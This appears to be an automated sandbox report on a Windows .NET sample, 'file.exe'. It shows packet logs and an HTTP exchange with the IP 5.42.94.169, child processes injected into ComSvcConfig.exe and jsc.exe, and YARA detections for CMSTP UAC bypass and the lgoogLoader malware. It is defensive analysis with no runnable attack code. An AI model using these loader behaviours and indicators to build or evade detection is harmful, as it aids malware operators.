Jun 6, 2023 17:14:52.328962088 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328978062 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.328980923 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.328999043 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329018116 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329035044 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329072952 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329132080 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329152107 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329169989 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329189062 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329202890 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329205990 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329225063 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329227924 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329243898 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329262018 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329263926 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329279900 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329299927 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329315901 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329330921 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329350948 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329355955 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329380035 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329397917 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329427004 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329452038 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329471111 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329477072 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329502106 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329514027 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329528093 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329552889 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329571009 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329577923 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329605103 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329617977 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329631090 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329657078 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329668999 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329683065 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329709053 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329726934 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329735041 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329761982 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329787016 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329796076 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329813004 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329824924 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329840899 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329865932 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329883099 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329890966 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329916000 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329935074 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329941988 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329967976 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.329986095 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.329993010 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330020905 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330041885 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330048084 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330075026 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330101013 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330126047 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330152035 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330152035 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330177069 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330204010 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330216885 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330230951 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330257893 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330281973 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330282927 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330311060 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330338955 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330365896 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330385923 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330391884 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330420017 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330445051 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330468893 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330483913 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330495119 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330522060 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330549002 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330550909 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330574989 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330600977 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330610991 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330627918 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330655098 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330672979 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330681086 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330710888 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.330723047 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330775976 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330915928 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.330981016 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.377309084 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377357960 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377378941 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377397060 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377414942 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377437115 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377454996 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377475023 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377497911 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377517939 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377532005 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.377542973 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.377588987 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.433121920 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:15:00.729165077 CEST	49708	80	192.168.2.6	5.42.94.169

HTTP Request Dependency Graph

5.42.94.169

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49708	5.42.94.169	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Jun 6, 2023 17:14:51.860167980 CEST	91	OUT	GET /customer/368 HTTP/1.1 Host: 5.42.94.169 Connection: Keep-Alive
Jun 6, 2023 17:14:51.911331892 CEST	93	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Tue, 06 Jun 2023 15:14:51 GMT Server: Kestrel Cache-Control: no-cache, no-store, max-age=0 Transfer-Encoding: chunked Data Raw: 34 30 30 30 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 53 65 72 76 65 72 2e 73 74 79 6c 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 70 6e 67 22 2f 3e 0d 0a 20 20 20 20 3c 21 2d 2d 42 6c 61 7a 6f 72 3a 7b 22 73 65 71 75 65 6e 63 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 73 65 72 76 65 72 22 2c 22 70 72 65 72 65 6e 64 65 72 49 64 22 3a 22 39 66 31 63 38 32 33 36 62 63 30 63 34 36 34 36 39 38 63 32 36 65 39 36 64 30 37 61 64 38 32 63 22 2c 22 64 65 73 63 72 69 70 74 6f 72 22 3a 22 43 66 44 4a 38 4e 47 44 6a 6c 62 42 4f 52 4e 45 6c 51 67 69 4d 4b 5c 75 30 30 32 42 35 53 5c 75 30 30 32 42 74 74 2f 52 77 6b 6a 68 61 70 42 43 79 58 74 66 53 4a 33 65 6e 71 42 38 64 69 63 64 57 35 62 51 57 46 4b 47 6f 4a 4c 70 4c 50 50 37 47 37 75 55 6d 38 6c 2f 4d 72 74 62 39 48 36 7a 4f 46 6d 56 32 4c 4f 38 47 38 38 6f 59 58 68 41 62 66 67 79 69 4d 51 78 4e 48 52 4d 30 6d 49 34 55 74 64 68 2f 5c 75 30 30 32 42 47 62 39 70 5c 75 30 30 32 42 79 47 30 4d 57 4b 30 67 6b 79 52 37 77 58 48 35 64 67 38 4d 71 55 37 6e 72 30 6f 57 62 41 64 6a 53 70 66 4a 6d 37 6c 64 39 59 72 4d 32 45 6a 52 47 59 42 68 77 4b 78 57 33 31 74 61 42 32 35 45 68 55 42 33 36 5a 7a 4e 63 69 33 78 36 6f 2f 65 56 42 59 79 4f 71 33 57 63 54 55 74 67 47 53 4c 4c 4f 62 6f 68 56 54 31 50 2f 6e 74 73 75 74 75 58 53 51 65 71 7a 41 65 6a 54 42 5c 75 30 30 32 42 7a 51 35 43 42 6f 57 4a 42 51 75 30 30 36 77 52 57 4c 33 31 66 44 4d 33 30 53 4f 59 50 54 58 35 67 74 6a 44 34 33 65 55 35 77 5c 75 30 30 32 42 30 62 6e 78 70 50 34 70 53 4f 4e 48 39 48 65 4b 44 64 62 51 6b 6e 46 77 30 6e 4e 35 5a 7a 62 65 48 31 48 66 37 75 73 63 6c 70 4a 33 59 57 5c 75 30 30 32 42 51 72 32 7a 41 5a 4d 61 36 4c 64 53 46 45 2f 38 2f 38 55 34 6f 39 61 54 6c 57 6a 35 33 4a 30 79 57 30 6d 32 32 58 36 51 68 51 48 41 73 67 4c 39 5a 46 70 79 47 30 37 58 6d 66 50 41 2f 47 2f 66 65 72 59 5a 55 4b 43 70 38 65 79 4a 7a 32 4c 50 52 31 74 68 41 51 4e 43 64 22 7d 2d 2d 3e 3c 21 2d 2d 42 6c 61 7a 6f 72 3a 7b 22 70 72 65 72 65 6e 64 65 72 49 64 22 3a 22 39 66 31 63 38 32 33 36 62 63 30 63 34 36 34 36 39 38 63 32 36 65 39 36 64 30 37 61 64 38 32 63 22 7d 2d 2d 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 21 2d 2d 42 6c 61 7a 6f 72 3a 7b 22 Data Ascii: 4000<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <base href="/" /> <link rel="stylesheet" href="css/bootstrap/bootstrap.min.css" /> <link href="css/site.css" rel="stylesheet" /> <link href="Server.styles.css" rel="stylesheet" /> <link rel="icon" type="image/png" href="favicon.png"/> ...Blazor:{"sequence":0,"type":"server","prerenderId":"9f1c8236bc0c464698c26e96d07ad82c","descriptor":"CfDJ8NGDjlbBORNElQgiMK\u002B5S\u002Btt/RwkjhapBCyXtfSJ3enqB8dicdW5bQWFKGoJLpLPP7G7uUm8l/Mrtb9H6zOFmV2LO8G88oYXhAbfgyiMQxNHRM0mI4Utdh/\u002BGb9p\u002ByG0MWK0gkyR7wXH5dg8MqU7nr0oWbAdjSpfJm7ld9YrM2EjRGYBhwKxW31taB25EhUB36ZzNci3x6o/eVBYyOq3WcTUtgGSLLObohVT1P/ntsutuXSQeqzAejTB\u002BzQ5CBoWJBQu006wRWL31fDM30SOYPTX5gtjD43eU5w\u002B0bnxpP4pSONH9HeKDdbQknFw0nN5ZzbeH1Hf7usclpJ3YW\u002BQr2zAZMa6LdSFE/8/8U4o9aTlWj53J0yW0m22X6QhQHAsgL9ZFpyG07XmfPA/G/ferYZUKCp8eyJz2LPR1thAQNCd"}-->...Blazor:{"prerenderId":"9f1c8236bc0c464698c26e96d07ad82c"}--></head><body> ...Blazor:{"
Jun 6, 2023 17:14:51.911371946 CEST	94	IN	Data Raw: 73 65 71 75 65 6e 63 65 22 3a 31 2c 22 74 79 70 65 22 3a 22 73 65 72 76 65 72 22 2c 22 70 72 65 72 65 6e 64 65 72 49 64 22 3a 22 39 36 32 35 62 35 61 35 63 35 64 34 34 61 66 34 62 33 66 65 32 31 65 36 39 64 62 33 37 64 65 39 22 2c 22 64 65 73 63 Data Ascii: sequence":1,"type":"server","prerenderId":"9625b5a5c5d44af4b3fe21e69db37de9","descriptor":"CfDJ8NGDjlbBORNElQgiMK\u002B5S\u002BuagDPVxbc3SHb8CCMDWUoYK5DHawKj1mbQ299YPW03OpQHcw/MC\u002Bswj\u002BvQGomcjrZKVCLLe3JeVGPwGWEpBKwpQTKn\u002Bt2dN9Uxhmo
Jun 6, 2023 17:14:51.911385059 CEST	95	IN	Data Raw: 73 4e 62 33 6c 31 65 4c 6b 2f 4a 4d 66 68 6e 63 38 71 4e 36 55 4c 44 57 39 35 64 58 69 35 50 79 72 6d 6f 51 39 78 6e 78 38 35 46 42 68 37 66 4b 31 34 54 6f 4e 56 31 62 47 77 6f 54 74 44 77 56 63 74 26 23 78 32 42 3b 52 4d 26 23 78 32 42 3b 43 46 Data Ascii: sNb3l1eLk/JMfhnc8qN6ULDW95dXi5PyrmoQ9xnx85FBh7fK14ToNV1bGwoTtDwVct+RM+CFHfXdPpx6CEeqPzx2I37xjEoQq5HFvBghMxWTGx6KLamcK+7bIzPFSOLKSskfXDVGvUctlhrmmQWucyE6bAF5msY7Yl9fDqn3QvVqDFbjbHWaxzA/mbjxKoKUgifQSBwCrYSf9kE0+OqHp9Zqa6Bz1x1
Jun 6, 2023 17:14:51.911403894 CEST	97	IN	Data Raw: 47 4a 75 4d 6c 53 4d 31 4b 41 48 72 26 23 78 32 42 3b 48 47 35 6c 57 59 76 77 6d 4c 67 49 54 55 35 69 63 4b 36 70 73 59 4a 30 37 37 67 64 59 6f 73 64 56 77 55 41 7a 53 50 6d 74 56 4c 74 54 6e 35 76 6b 62 45 37 4d 71 36 34 65 38 4d 69 46 41 45 36 Data Ascii: GJuMlSM1KAHr+HG5lWYvwmLgITU5icK6psYJ077gdYosdVwUAzSPmtVLtTn5vkbE7Mq64e8MiFAE6D1tIIht8Tq69kmyVVBZEEQGZ7OD89TRFULFAGXTE9K+ekTbDiSKDcOHj0tnBxVMWFdOUCp7emKgqqbFKVwxSlRbCD0jjbOB+fOzdkc6oUNRdSHAshcbu3HV8WJ8N7ea9rZBOue0p0wIQxBXSxg2dT9H
Jun 6, 2023 17:14:51.911417961 CEST	98	IN	Data Raw: 78 32 42 3b 63 5a 64 74 75 61 49 58 4b 4d 68 49 51 69 76 31 49 6d 68 7a 42 58 75 54 6f 4c 46 6c 6d 6e 73 41 74 38 7a 30 72 36 4f 58 62 44 59 76 67 47 78 59 32 6a 41 38 4d 51 68 43 7a 6c 58 6d 39 76 50 35 31 5a 54 64 48 6a 70 67 4a 51 46 26 23 78 Data Ascii: x2B;cZdtuaIXKMhIQiv1ImhzBXuToLFlmnsAt8z0r6OXbDYvgGxY2jA8MQhCzlXm9vP51ZTdHjpgJQF+jcyEkoaAvK5cEnr4iopUGkCY85Nxjar+kfWS5JXLfbil/Jqn3OIweJvatTWAm2xk/InYCaJjSEhBh7eB3vPQYzoPbKPG+SW7vP6f6whZfQgLxiDTNxKkPzJLwCmj+XEoUUeU2/Ihav3KQoB
Jun 6, 2023 17:14:51.911432028 CEST	99	IN	Data Raw: 69 66 47 78 34 5a 49 30 68 52 2f 56 6e 4e 36 64 4c 44 65 62 63 77 26 23 78 32 42 3b 67 5a 72 47 75 5a 61 52 68 73 75 49 79 39 26 23 78 32 42 3b 73 6a 76 62 4a 6b 46 48 56 6f 49 68 6a 75 38 4d 57 72 41 70 57 31 78 48 6a 75 26 23 78 32 42 3b 64 51 Data Ascii: ifGx4ZI0hR/VnN6dLDebcw+gZrGuZaRhsuIy9+sjvbJkFHVoIhju8MWrApW1xHju+dQivr4sZk7Shp8aHeGYnibYOc+FHurr9ZSFjVxWiTP+lIO0O9UaUFHCw23UEPPm+wz3nBOXrqrt6HeltNc4KOZ90xaD992P9x5YnTM7EO/S4jgG9SQHX1oNBoH/nEc0qLP85YZf7oJAuqHldZoU1
Jun 6, 2023 17:14:51.911446095 CEST	101	IN	Data Raw: 62 34 75 35 2f 64 53 41 56 55 74 33 62 67 75 6c 6c 4c 35 72 76 4f 45 31 73 42 47 5a 6c 73 76 33 45 55 67 59 68 53 41 79 71 75 71 55 57 45 76 5a 6f 32 64 69 36 6a 7a 72 4e 37 57 6c 43 4b 2f 51 65 4b 4b 5a 6f 73 6a 61 56 36 51 66 73 63 78 69 26 23 Data Ascii: b4u5/dSAVUt3bgullL5rvOE1sBGZlsv3EUgYhSAyquqUWEvZo2di6jzrN7WlCK/QeKKZosjaV6Qfscxi+40MD6mI/w2UMwrXhrjhhwlfYkyBgS+WKFP0/z6RtWRdRlBo4Nhya9IQhWMEGCAUJdocUD09Z8u9fylqlIdsqdLl4mYB9lnGCx8B+Uev0LvTzoxZf7YWkL/spwOv5SlxS67adnPpFME+0&#
Jun 6, 2023 17:14:51.911465883 CEST	102	IN	Data Raw: 62 57 71 5a 34 44 5a 7a 6e 31 4d 4b 50 54 55 59 54 74 32 64 76 59 4e 26 23 78 32 42 3b 4e 6f 7a 78 79 2f 4e 35 73 4e 4e 4d 68 43 64 36 36 73 72 62 70 4e 76 33 47 64 76 42 59 57 4b 49 2f 42 31 61 62 7a 34 6a 75 45 5a 55 67 6e 75 4a 35 71 4d 50 4c Data Ascii: bWqZ4DZzn1MKPTUYTt2dvYN+Nozxy/N5sNNMhCd66srbpNv3GdvBYWKI/B1abz4juEZUgnuJ5qMPLfatd7Ro7ige1DYrdrwpckMtG6LMNmPCV+prmJilkqToNeRkHsXGEh6k+bCkUjeVIqz9HNi8XwCh/U3d1AjwHlybVJZqYzAcR1U3ZHj/adp60/61te3u8gOOTJjZP8tcUVYt5C4/1NEekqNZWzK89vms
Jun 6, 2023 17:14:51.911478996 CEST	103	IN	Data Raw: 23 78 32 42 3b 66 51 59 38 48 5a 31 45 64 64 4e 6a 67 26 23 78 32 42 3b 4e 44 6f 77 6a 74 42 56 38 6d 6f 45 57 32 44 56 44 4a 6f 59 53 67 39 67 48 69 4d 62 4f 67 43 2f 47 63 68 68 6f 62 42 79 49 6a 70 63 76 6c 61 6b 6a 47 4a 47 77 45 79 6c 55 72 Data Ascii: #x2B;fQY8HZ1EddNjg+NDowjtBV8moEW2DVDJoYSg9gHiMbOgC/GchhobByIjpcvlakjGJGwEylUrviK+nZmhsijU5IpXhiVRIshB0dgp03Zd9dCbInwwVoMN/dZAGSNp12GYbDb0pLlbCHo6kuQ28TvDIxQ84SRWRKu8RbI3H+NSLk9vsJcLuDq+gPFtvnbX1haQE0C1rckeDUtQb6/W1eiYY3yrk4
Jun 6, 2023 17:14:51.911498070 CEST	105	IN	Data Raw: 52 49 42 37 48 42 4c 26 23 78 32 42 3b 45 72 77 6c 6b 47 30 65 49 4f 4f 46 57 5a 47 38 7a 37 6f 74 4e 5a 61 70 43 37 48 37 26 23 78 32 42 3b 44 49 70 48 47 52 69 72 6c 67 32 69 33 67 6e 67 4e 4e 58 74 4d 76 62 70 30 32 4e 51 45 6d 66 49 67 6c 72 Data Ascii: RIB7HBL+ErwlkG0eIOOFWZG8z7otNZapC7H7+DIpHGRirlg2i3gngNNXtMvbp02NQEmfIglr0xSA2vJK9cWz4xLoAXcM5F58CLBdvLdxTD4vBUV4JThtwtI6BMg3UGR/8T6h0SDXdiwR3NMxrn83HcGQ8cP+0ORrR6S96Br2xGSo4Y+EiPL6HCQSbgsIFJXnr2+W+S0K3x5jE/NuUrN5C
Jun 6, 2023 17:14:51.960335970 CEST	106	IN	Data Raw: 71 41 53 58 6f 39 68 4e 52 55 69 52 38 67 68 68 71 4b 4a 2f 2f 62 56 4e 37 38 71 4f 65 45 76 70 52 54 70 5a 48 67 6d 52 69 55 74 35 70 4c 59 79 75 62 65 4a 49 6b 36 47 7a 6e 74 54 61 36 4f 2f 32 48 42 75 53 38 59 64 56 48 70 4f 52 69 54 72 61 32 Data Ascii: qASXo9hNRUiR8ghhqKJ//bVN78qOeEvpRTpZHgmRiUt5pLYyubeJIk6GzntTa6O/2HBuS8YdVHpORiTra26rB1VEuvSuSIfNRYvbKgT/lq0E3lMEKTfQGb80Qy6UiQvrvqutFQvRFaCSxtdFZYIO2726WwOIJb6oQKYCI9yOCLO0hkzgBfgJZ++9ZuoVU6OyZtsV/tKpUt779WhGpHGcZ2WK7BQFm637Nf4atsTsy

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 6988, Parent PID: 3452

General

Target ID:	0
Start time:	17:14:48
Start date:	06/06/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x1f6c58b0000
File size:	30720 bytes
MD5 hash:	DAF761FB9AAA34A9C2120003694D88A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ComSvcConfig.exePID: 4572, Parent PID: 6988

General

Target ID:	1
Start time:	17:14:59
Start date:	06/06/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
Imagebase:	0x13570130000
File size:	173672 bytes
MD5 hash:	2778AE0EB674B74FF8028BF4E51F1DF5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: jsc.exePID: 3068, Parent PID: 6988

General

Target ID:	2
Start time:	17:14:59
Start date:	06/06/2023
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
Imagebase:	0x8b0000
File size:	46688 bytes
MD5 hash:	2B40A449D6034F41771A460DADD53A60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_lGoogLoader, Description: Yara detected lgoogLoader, Source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 6988, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	19.4%
Total number of Nodes:	31
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFC9CFA58C4 Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FFC9CFB6020

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 328febc17f466ae486858dbbc8d52777c3db706fe643e9e44dd901143c3d7f07
Instruction ID: 7ef79737925a98a7e4e8e210bda5e23a413299e152fda65acd35e8dc53bbb312
Opcode Fuzzy Hash: 328febc17f466ae486858dbbc8d52777c3db706fe643e9e44dd901143c3d7f07
Instruction Fuzzy Hash: 5C518F31908A2D8FDF58DF08D895AE9B7F1FB68310F0042AAD44EE3291DB74A945CB91

Uniqueness

Uniqueness Score: -1.00%

